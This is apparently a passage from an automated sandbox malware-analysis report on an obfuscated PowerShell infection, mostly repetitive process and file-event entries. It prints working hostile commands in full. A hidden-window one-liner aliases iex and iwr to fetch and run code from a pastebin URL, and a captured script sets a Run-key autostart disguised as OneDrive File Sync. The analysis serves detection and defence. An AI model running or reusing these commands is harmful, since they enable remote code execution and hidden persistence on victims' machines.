Source: Binary string: \??\C:\Windows\mscorlib.pdbEh source: powershell.exe, 0000000F.00000002.2477570747.000002D1B8062000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbs source: powershell.exe, 0000000A.00000002.2400175802.000001986F9EB000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdblp source: powershell.exe, 0000000F.00000002.2477570747.000002D1B808E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Cn.pdb8 source: powershell.exe, 0000000A.00000002.2399330590.000001986F9C3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\Microsoft.PowerShell.Commands.Utility.pdbpdbity.pdb source: powershell.exe, 0000000F.00000002.2477570747.000002D1B8062000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

barindex
Suspicious powershell command line found
Source: C:\Windows\System32\forfiles.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"
Source: C:\Windows\System32\forfiles.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"
Source: C:\Windows\System32\forfiles.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"Jump to behavior
Source: C:\Windows\System32\forfiles.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\j0w3v5ey\j0w3v5ey.cmdline"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\j0w3v5ey\j0w3v5ey.cmdline"Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD9B7E62B9 push esp; retf 0_2_00007FFD9B7E62BA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD9B7F5D1A pushad ; iretd 0_2_00007FFD9B7F5D1D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD9B7F54B8 pushfd ; iretd 0_2_00007FFD9B7F5591
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD9B7E00AD pushad ; iretd 0_2_00007FFD9B7E00C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD9B8B7EEB push ecx; ret 0_2_00007FFD9B8B7EEC
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00007FFD9B80E1CA push edx; iretd 10_2_00007FFD9B80E1CB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00007FFD9B8000AD pushad ; iretd 10_2_00007FFD9B8000C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00007FFD9B812558 push E8FFFFFFh; iretd 10_2_00007FFD9B81255D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00007FFD9B8D6DC3 push edi; iretd 10_2_00007FFD9B8D6DC6
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\j0w3v5ey\j0w3v5ey.dllJump to dropped file

Boot Survival

barindex
Powershell creates an autostart link
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: .lnk" -Forcesleep 5$googoogaagaa = "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"if (-Not (Test-Path $googoogaagaa)) {rm $env:tmp\onedrivefilesync.dll -forceNew-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" -Name "OneDrive File Sync" -Value '"C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"' -PropertyType String -Forcemkdir "C:\ProgramData\Microsoft OneDrive\FileSync";$savedbytes = (76,0,0,0,1,20,2,0,0,0,0,0,192,0,0,0,0,0,0,70,171,0,8,0,32,0,0,0,124,37,104,27,210,97,216,1,203,131,156,28,20,3,219,1,124,37,104,27,210,97,216,1,0,16,1,0,0,0,0,0,7,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,69,1,20,0,31,80,224,79,208,32,234,58,105,16,162,216,8,0,43,48,48,157,25,0,47,67,58,92,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,86,0,49,0,0,0,0,0,23,89,186,133,48,0,87,105,110,100,111,119,115,0,64,0,9,0,4,0,239,190,167,84,44,42,41,89,8,186,46,0,0,0,246,25,0,0,0,0,2,0,0,0,0,0,12,1,0,0,0,0,0,0,0,0,46,238,28,1,87,0,105,0,110,0,100,0,111,0,119,0,115,0,0,0,22,0,90,0,49,0,0,0,0,0,36,89,104,183,16,0,83,121,115,116,101,109,51,50,0,0,66,0,9,0,4,0,239,190,167,84,44,42,41,89,8,186,46,0,0,0,76,95,0,0,0,0,3,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,208,173,33,0,83,0,121,0,115,0,116,0,101,0,109,0,51,0,50,0,0,0,24,0,102,0,50,0,0,16,1,0,167,84,130,42,32,0,102,111,114,102,105,108,101,115,46,101,120,101,0,0,74,0,9,0,4,0,239,190,167,84,130,42,41,89,208,189,46,0,0,0,65,248,0,0,0,0,1,0,0,0,0,0,116,0,0,0,0,0,0,0,0,0,132,116,26,0,102,0,111,0,114,0,102,0,105,0,108,0,101,0,115,0,46,0,101,0,120,0,101,0,0,0,28,0,0,0,86,0,0,0,28,0,0,0,1,0,0,0,28,0,0,0,52,0,0,0,0,0,0,0,85,0,0,0,24,0,0,0,3,0,0,0,96,56,18,250,16,0,0,0,87,105,110,100,111,119,115,0,67,58,92,87,105,110,100,111,119,115,92,83,121,115,116,101,109,51,50,92,102,111,114,102,105,108,101,115,46,101,120,101,0,0,38,0,46,0,46,0,92,0,46,0,46,0,92,0,46,0,46,0,92,0,87,0,105,0,110,0,100,0,111,0,119,0,115,0,92,0,83,0,121,0,115,0,116,0,101,0,109,0,51,0,50,0,92,0,102,0,111,0,114,0,102,0,105,0,108,0,101,0,115,0,46,0,101,0,120,0,101,0,215,0,47,0,112,0,32,0,99,0,58,0,92,0,119,0,105,0,110,0,100,0,111,0,119,0,115,0,92,0,115,0,121,0,115,0,116,0,101,0,109,0,51,0,50,0,32,0,47,0,109,0,32,0,110,0,111,0,116,0,101,0,112,0,97,0,100,0,46,0,101,0,120,0,101,0,32,0,47,0,99,0,32,0,34,0,112,0,111,0,119,0,101,0,114,0,115,0,104,0,101,0,108,0,108,0,46,0,101,0,120,0,101,0,32,0,45,0,99,0,111,0,109,0,109,0,97,0,110,0,100,0,32,0,112,0,111,0,119,0,101,0,114,0,115,0,104,0,101,0,108,0,108,0,32,0,45,0,119,0,105,0,110,0,100,0,111,0,119,0,115,0,116,0,121,0,108,0,101,0,32,0,104,0,32,0,45,0,99,0,111,0,109,0,109,0,97,0,110,0,100,0,32,0,39,0,115,0,97,0,108,0,32,0,102,0,97,0,116,0,98,0,97,0,107,0,101,0,32,0,99,0,97,0,108,0,99,0,59,0,115,0,97,0,108,0,32,0,99,0,97,0,108,0,108,0,105,0,116,0,32,0,105,0,69,0,120,0,59,0,32,0,115,0,97,0,108,0,32,0,36,0,101,0,110,0,118,0,58,0,111,0,115,0,32,0,105,0,87,0,114,0,59,0,32,0,99,0,97,0,108,0,108,0,105,0,84,0,40,0,87,0,73,0,78,0,68,0,79,0,87,0,83,0,95,0,78,0,84,0,32,0,112,0,97,0,115,0,116,0,101,0,98,0,105,0,110,0,46,0,99,0,111,0,109,
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: .lnk" -Forcesleep 5$googoogaagaa = "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"if (-Not (Test-Path $googoogaagaa)) {rm $env:tmp\onedrivefilesync.dll -forceNew-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" -Name "OneDrive File Sync" -Value '"C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"' -PropertyType String -Forcemkdir "C:\ProgramData\Microsoft OneDrive\FileSync";$savedbytes = (76,0,0,0,1,20,2,0,0,0,0,0,192,0,0,0,0,0,0,70,171,0,8,0,32,0,0,0,124,37,104,27,210,97,216,1,203,131,156,28,20,3,219,1,124,37,104,27,210,97,216,1,0,16,1,0,0,0,0,0,7,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,69,1,20,0,31,80,224,79,208,32,234,58,105,16,162,216,8,0,43,48,48,157,25,0,47,67,58,92,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,86,0,49,0,0,0,0,0,23,89,186,133,48,0,87,105,110,100,111,119,115,0,64,0,9,0,4,0,239,190,167,84,44,42,41,89,8,186,46,0,0,0,246,25,0,0,0,0,2,0,0,0,0,0,12,1,0,0,0,0,0,0,0,0,46,238,28,1,87,0,105,0,110,0,100,0,111,0,119,0,115,0,0,0,22,0,90,0,49,0,0,0,0,0,36,89,104,183,16,0,83,121,115,116,101,109,51,50,0,0,66,0,9,0,4,0,239,190,167,84,44,42,41,89,8,186,46,0,0,0,76,95,0,0,0,0,3,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,208,173,33,0,83,0,121,0,115,0,116,0,101,0,109,0,51,0,50,0,0,0,24,0,102,0,50,0,0,16,1,0,167,84,130,42,32,0,102,111,114,102,105,108,101,115,46,101,120,101,0,0,74,0,9,0,4,0,239,190,167,84,130,42,41,89,208,189,46,0,0,0,65,248,0,0,0,0,1,0,0,0,0,0,116,0,0,0,0,0,0,0,0,0,132,116,26,0,102,0,111,0,114,0,102,0,105,0,108,0,101,0,115,0,46,0,101,0,120,0,101,0,0,0,28,0,0,0,86,0,0,0,28,0,0,0,1,0,0,0,28,0,0,0,52,0,0,0,0,0,0,0,85,0,0,0,24,0,0,0,3,0,0,0,96,56,18,250,16,0,0,0,87,105,110,100,111,119,115,0,67,58,92,87,105,110,100,111,119,115,92,83,121,115,116,101,109,51,50,92,102,111,114,102,105,108,101,115,46,101,120,101,0,0,38,0,46,0,46,0,92,0,46,0,46,0,92,0,46,0,46,0,92,0,87,0,105,0,110,0,100,0,111,0,119,0,115,0,92,0,83,0,121,0,115,0,116,0,101,0,109,0,51,0,50,0,92,0,102,0,111,0,114,0,102,0,105,0,108,0,101,0,115,0,46,0,101,0,120,0,101,0,215,0,47,0,112,0,32,0,99,0,58,0,92,0,119,0,105,0,110,0,100,0,111,0,119,0,115,0,92,0,115,0,121,0,115,0,116,0,101,0,109,0,51,0,50,0,32,0,47,0,109,0,32,0,110,0,111,0,116,0,101,0,112,0,97,0,100,0,46,0,101,0,120,0,101,0,32,0,47,0,99,0,32,0,34,0,112,0,111,0,119,0,101,0,114,0,115,0,104,0,101,0,108,0,108,0,46,0,101,0,120,0,101,0,32,0,45,0,99,0,111,0,109,0,109,0,97,0,110,0,100,0,32,0,112,0,111,0,119,0,101,0,114,0,115,0,104,0,101,0,108,0,108,0,32,0,45,0,119,0,105,0,110,0,100,0,111,0,119,0,115,0,116,0,121,0,108,0,101,0,32,0,104,0,32,0,45,0,99,0,111,0,109,0,109,0,97,0,110,0,100,0,32,0,39,0,115,0,97,0,108,0,32,0,102,0,97,0,116,0,98,0,97,0,107,0,101,0,32,0,99,0,97,0,108,0,99,0,59,0,115,0,97,0,108,0,32,0,99,0,97,0,108,0,108,0,105,0,116,0,32,0,105,0,69,0,120,0,59,0,32,0,115,0,97,0,108,0,32,0,36,0,101,0,110,0,118,0,58,0,111,0,115,0,32,0,105,0,87,0,114,0,59,0,32,0,99,0,97,0,108,0,108,0,105,0,84,0,40,0,87,0,73,0,78,0,68,0,79,0,87,0,83,0,95,0,78,0,84,0,32,0,112,0,97,0,115,0,116,0,101,0,98,0,105,0,110,0,46,0,99,0,111,0,109,
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run OneDrive File SyncJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run OneDrive File SyncJump to behavior

Hooking and other Techniques for Hiding and Protection

barindex
Tries to open files direct via NTFS file id
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: NULLJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: NULLJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
